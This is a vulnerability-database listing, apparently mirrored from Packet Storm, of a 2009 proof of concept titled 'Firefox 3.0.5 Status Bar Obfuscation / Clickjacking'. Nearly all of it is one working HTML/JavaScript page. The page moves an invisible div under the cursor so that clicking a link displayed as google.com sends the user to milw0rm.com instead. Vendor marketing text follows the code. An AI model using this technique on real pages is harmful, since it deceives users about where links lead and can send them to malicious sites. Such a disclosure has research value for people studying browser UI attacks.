Lucene search
K

Firefox 3.0.5 Status Bar Obfuscation / Clickjacking

🗓️ 21 Jan 2009 00:00:00Reported by MrDougType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 17 Views

Firefox 3.0.5 Status Bar Obfuscation / Clickjackin

Code
`Firefox 3.0.5 Status Bar Obfuscation / Clickjacking  
===========================================  
  
<html>  
<body>  
<div id="mydiv"  
onmouseover="document.location='http://www.milw0rm.com';"  
style="position:absolute;width:2px;height:2px;background:#FFFFFF;border:0px"></div>  
<script>  
function updatebox(evt) {  
mouseX=evt.pageX?evt.pageX:evt.clientX;  
mouseY=evt.pageY?evt.pageY:evt.clientY;  
document.getElementById('mydiv').style.left=mouseX-1;  
document.getElementById('mydiv').style.top=mouseY-1;  
}  
</script>  
<center>  
<br>  
<font style="font-family:arial;font-size:32px">Status Bar Obfuscation  
/ Clickjacking</font><br>  
<font style="font-family:arial;font-size:24px">By MrDoug</font><br>  
<br>  
<hr size="3" width="500" color="#000000">  
<br>  
<font style="font-family:arial;font-size:20px">Click the VALID link to  
google below to visit milw0rm.com</font><br>  
<br>  
<a href="http://www.google.com" onclick="updatebox(event)"><font  
style="font-family:arial;font-size:32px">http://www.google.com</font></a><br>  
<br>  
<hr size="3" width="500" color="#000000">  
<br>  
<font style="font-family:arial;font-size:16px">Greetz to Slappywag</font><br>  
</center>  
<div style="position:absolute;bottom:0;">  
<font style="font-family:arial;font-size:32px">Note this...<br>  
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;|&nbsp;<br>  
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;V  
</font>  
</div>  
</body>  
</html>  
  
===========================================  
MrDoug  
mrdoug13[at]gmail[dot]com  
  
  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation